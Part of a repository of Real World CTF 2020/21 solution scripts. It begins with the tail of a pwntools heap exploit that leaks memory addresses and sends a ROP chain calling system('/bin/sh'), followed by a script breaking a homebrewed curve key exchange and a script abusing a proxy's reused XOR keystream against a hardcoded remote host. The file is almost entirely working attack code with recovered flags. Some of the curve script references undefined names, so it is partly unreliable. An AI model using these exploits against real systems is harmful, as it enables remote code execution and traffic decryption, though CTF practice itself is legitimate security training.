 88 |     elif b'rhttp' in line:
 89 |         text_base = addr
 90 | print(hex(text_base))
 91 | print(hex(heap_base))
 92 | print(hex(libc_base))
 93 | raw_input('c5+')
 94 | c5.send(('word=' + 'A' * obj_size + '&').ljust(large_content_size, '\x00'))
 95 | raw_input('c6')
 96 | c6.send('''Content-Length: %d\r\n\r\n''' % (large_content_size))
 97 | raw_input('c7')
 98 | c7 = make_conn()
 99 | # c8 = make_conn()
100 | # c7's HttpParser is current user comment
101 | raw_input('c10')
102 | ptr_7 = text_base + 0x12c8
103 | ptr_8 = text_base + 0x70
104 | orig_io = heap_base + 0x51ab0
105 | parser_addr = heap_base + 0x91e10
106 | rsp = heap_base + 0x4b908
107 | print(hex(rsp))
108 | parser = p64(orig_io)
109 | parser = parser.ljust(0x2010, b'\x00') + p64(rsp - 1) + p64(rsp - 1)
110 | c10.send('''Content-Length: %d\r\n\r\n''' % (obj_size + 1))
111 | raw_input('c10+')
112 | c10.send(parser[:-1])
113 | raw_input('cx')
114 | cx.send('X')
115 | raw_input('c7')
116 | c7.send('7')
117 | raw_input('c7+')
118 | pop_rdi = text_base + 0x1f503
119 | bin_sh = libc_base + 0x1b75aa
120 | system = libc_base + 0x55410
121 | rop = b''.join(map(p64, [pop_rdi + 1, pop_rdi, bin_sh, system]))
122 | c7.send(rop)
123 | raw_input('cx+')
124 | cx.send('X')
125 | 
126 | p.interactive()
127 | 


--------------------------------------------------------------------------------
/rwctf20-21/homebrewed_curve.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import random
 4 | import hashlib
 5 | import binascii
 6 | 
 7 | from libnum import invmod
 8 | from Crypto.Cipher import AES
 9 | from Crypto.Util.number import long_to_bytes
10 | # from Crypto.Util.Padding import pad
11 | 
12 | # from secret import FLAG, P
13 | P = 16964155551072495694293641975607630224727620299506094680698561697517114055981456463802735036670824528486635128253757386796419676408241481233714972382812783160754601985902695360703612064223677630625126592834772106201583720344150312382723959316671117708799304253580291408927697557459674805267132980104779404642276846095233729275890317878916892907703929715499923974553217760175425647369679697361138159243363407958468903965694813367459663590914481184614924748816307473556323329341018650081832249242635801731713869201574073433674020290004290751530577883843107369211669006291178070342858539229191025760918841972906522445981
14 | 
15 | class Curve:
16 | 
17 |     def __init__(self, **kwargs):
18 |         self.__dict__.update(kwargs)
19 | 
20 |     def add(self, p1, p2):
21 |         if p1 == self.zero:
22 |             return p2
23 | 
24 |         if p2 == self.zero:
25 |             return p1
26 | 
27 |         x1, y1 = p1
28 |         x2, y2 = p2
29 | 
30 |         if x1 != x2:
31 |             l = (y2 - y1) * invmod(x2 - x1, P)
32 |         else:
33 |             l = 2 * self.a * x1 + self.b
34 | 
35 |         x = ((l - self.b) * invmod(self.a, P) - self.zero[0]) % P
36 |         y = ((x - self.zero[0]) * l + self.zero[1]) % P
37 | 
38 |         return (x, y)
39 | 
40 |     def mul(self, p1, n):
41 |         if n == 0 or p1 == self.zero:
42 |             return self.zero
43 | 
44 |         res = self.zero
45 |         while n:
46 |             if n & 1:
47 |                 res = self.add(res, p1)
48 |             p1 = self.add(p1, p1)
49 |             n >>= 1
50 |         return res
51 | 
52 |     def gen_key(self):
53 |         sk = random.randint(1, P)
54 |         pk = self.mul(self.gen, sk)
55 |         return sk, pk
56 | 
57 | curve = Curve(
58 |     a=338105350242668308929697763396044301660,
59 |     b=70631159681042046635446173236982478064116538177970218795092411634131296885767,
60 |     zero=(9754705134713370500425418962906364916694128219443986534870265438313712052553913556304578048773182865236181393234774811636563665254738358548547686098321918938336999994543320310489785839068889289585561389237322554300534800377365494547910434446171077511660646734142974631896227159038644834795595939445003783184271907835168083982210804135992472981458997056367475361358045062954295385753362817510369968941277639065938619221482008127361125972584968230982231483416783792258479416113581249377750311129019561848383083514672254514692875070293706012921153875918378772956871354902564753931679232128607231527456371560574893648150, 1568631189076775839914050721386821274436631828518639911590203429753674249963724465949098434816249858592209181914562366684848647341809527620103035336678319490054708958682690371323396425059326761139960520329829342510826324634871361342587962617109233961205192373716747727013613655062002124851676969800006190929713777159839273173689438005523473921392011053323705509027606365967531781465002057406686284573053674133382181877418753925610208463393821516137543581472014268533517599374830226690216017114664929426655189944119312800402788151756994817725042844409983509754618168400455155658767237036605650525875166823462486072842),
61 |     gen=(12532998589621080097666945122441206260965625062664570083674602252675892295679594034580389931735096079697125441246960301905307858329289188790029626634485829771734823159182904621402737540757430079518142479215838577833498703259391220160619426650385355407344355318793784733990238754982178179201863773450543367485332580658467529082154218982726945799974265641603861234501912638573835723384717842487988638277214429988591192513007462677389252245306874828268739787612245357189986581131725474432904172834643657027954405787429995826738074015516166702962206858859896933459093477305874443350335332968385035927605359630747331204285, 9677982578222119974363478748399786948047636069661692206522662047830643067492306311529114015320387572903840619331518584584400368845497864412752196098241604714699115186432809693851692194762433385961429711487895639093866274072187416400859677893102613898063134064507994013600600120524875666883108971040402000931357050726739367647257578379098507781478457700720118945453670136245178829199722575486626106268256525611370267664890630521019846806960099333376121482220389744953231843397729642415527736926160072478730239575933321480584291410141867063436921546657245313608614224909988684794138541856898030369431518091733072867437),
62 | )
63 | 
64 | '''
65 | ak, A = curve.gen_key()
66 | bk, B = curve.gen_key()
67 | '''
68 | # sa = (xa - m) * inverse_mod(g[0] - m, P)
69 | 
70 | ak = 6944333005347578558386377936565780804514317142506476881408778241378557439200186170394502397098964765561353629675404547161221735063732916786351208344027257427983157758861534646582700121668921466260825666827800469703105100182331796407725399156353255570200445441008569277075557485946076630458052269636003527712964965548363566390632065919065579481224613580358561198279723361234853863228473143165675239914467740358968148502979605845617674230006363494783941791703598501422809036862252951001385194010817211171836349140472732991053408609053389182293598631010231518608877050659097580083118316438228768509884428537034804965038
71 | bk = 3832817602208687565447303700819513883918433066433591087842602427813201984951555194461699005609163326940392983575655565503304495720162741116345427236582382216173231623952074286979565083484440540441328932082678469733853218086517221516475069037460116276560392371002262213103279563567100124953730413523116096948068885423832493714747078589879567735449420270301348560376898668434535638130653981364922637873585325252261878481294820471906214299419377922085333827976794547711174146454591811033420857593750681158000492826528889484701801738372329976772911310497867827614588045213673885966250724789764137484607318344298213209896
72 | t = a * inverse_mod(a, P)
73 | m = zero[0] * inverse_mod(2 * t - 1, P)
74 | A = curve.mul(curve.gen, ak)
75 | B = curve.mul(curve.gen, bk)
76 | print(A)
77 | print(B)
78 | shared = curve.mul(A, bk)[0]
79 | key = hashlib.sha256(long_to_bytes(shared)).digest()
80 | aes = AES.new(key, AES.MODE_ECB)
81 | # ciphertext = aes.encrypt(pad(FLAG, AES.block_size))
82 | # print(ciphertext.hex())
83 | plaintext = aes.decrypt(binascii.unhexlify('1c002f8ecfa9177ffed879245681dbb606ed194f319c12a0a0940c7193e490095e9915d9ce9252f8377def6a92bcab6a'))
84 | print(plaintext)
85 | # RWCTF{parab0la-curv3_1s_far_fr0m_g00d_en0ugh}
86 | 


--------------------------------------------------------------------------------
/rwctf20-21/personal_proxy.py:
--------------------------------------------------------------------------------
 1 | from binascii import unhexlify as unhex
 2 | from pwn import *
 3 | 
 4 | def xor(a, b):
 5 |     return bytes([x ^ y for x, y in zip(a, b)])
 6 | 
 7 | KS = unhex('7d07cba30c2a82cf2b2119e5ff2c')
 8 | 
 9 | host = bytes(map(int, '1.2.3.4'.split('.')))
10 | port = 0x4141
11 | 
12 | context.log_level = 'ERROR'
13 | 
14 | '''
15 | p0 = b'\x05\x06\x00\x01\x02\x03\x04\x05'
16 | for i in range(256):
17 |     r = remote('13.52.88.46', 50000)
18 |     r.send(xor(p0, KS))
19 |     d = r.recvn(2)
20 |     assert d == b'\x78\x07'
21 |     req = b'\x05\x01\x00\x03\x01'
22 |     assert len(req) == len(KS[len(p0):])
23 |     r.send(xor(req, KS[len(p0):]) + bytes([i]) + b'\xdd\xcc')
24 |     d = r.recvn(4, timeout=1)
25 |     print(i, xor(d, KS[2:]))
26 |     r.close()
27 |     '''
28 | 
29 | context.log_level = 'DEBUG'
30 | req = b'\x05\x02\x00\x01' + b'\x05\x01\x00\x01' + host + p16(port)
31 | assert len(req) == len(KS)
32 | r = remote('13.52.88.46', 50000)
33 | r.send(xor(req[:4], KS))
34 | d = r.recvn(2)
35 | assert d == b'\x78\x07'
36 | r.send(xor(req[4:], KS[4:]))
37 | d = r.recvn(10)
38 | print(xor(d, KS[2:]))
39 | raw = unhex('7ec2f5a654c86b20842b791c1a53a60938320f6854f6aca247b925c630db5de0ed489dca44a75b3cf48c14c200c5bf2ee27132d802905df15f4eda528cd7e4585f495c22402505d619f7819baa1c54625106d5767d62db32e24408f94a2c4430db00897c42ff20dba2e8c6cf6986fd1f1ac888c1946bbb65cdc61438f010d53262f93a6723c4568ab49b9741ca8c56e7b8aa9acafe5fcd367bd790d246e42460b9647de8844d4ffd573044a9d91da1efafc8e3dfa6fcf444285350382453932b04f8429daefb5846d4c2019cfee0f1118ba3e8be21ddc0eeb36322a6913e6f60bd2be59a62f440893599bfc3195e2578ae1ff26088726ce5739e9040710138aefee34c27552e8e0f62a6c8d30542a43077baef9a172a3e0babc9af331d17e0c4704d9f0c7642d4603008c1990021b9a5bd6b89c8c09d60d8e75af02109740987f58cae4713cad92fef9c0ccc5a094522904eda7510bf94276eef5cc87362a56477bae3803369ea4ff81cd4df24748276a5a1776841f4309391522ebf0fa222f20e2fe33d6b81f371e35479ba03a4d6b539c492aa92abda62cbb0167304f2826c0307b56ba8513163e46778')
40 | r.send(raw)
41 | 
42 | 
43 | '''
44 | User-Agent: curl/7.74.0
45 | Accept: */*
46 | Content-Length: 236
47 | Content-Type: multipart/form-data; boundary=------------------------2a2d903c655d5d18
48 | 
49 | --------------------------2a2d903c655d5d18
50 | Content-Disposition: form-data; name="file"; filename="flag.txt"
51 | Content-Type: text/plain
52 | 
53 | RWCTF{AEAD_1s_a_must_when_ch00s1ng_c1pher-meth0d}
54 | 
55 | --------------------------2a2d903c655d5d18--
56 | '''
57 | 
58 | # RWCTF{AEAD_1s_a_must_when_ch00s1ng_c1pher-meth0d}
59 | 


--------------------------------------------------------------------------------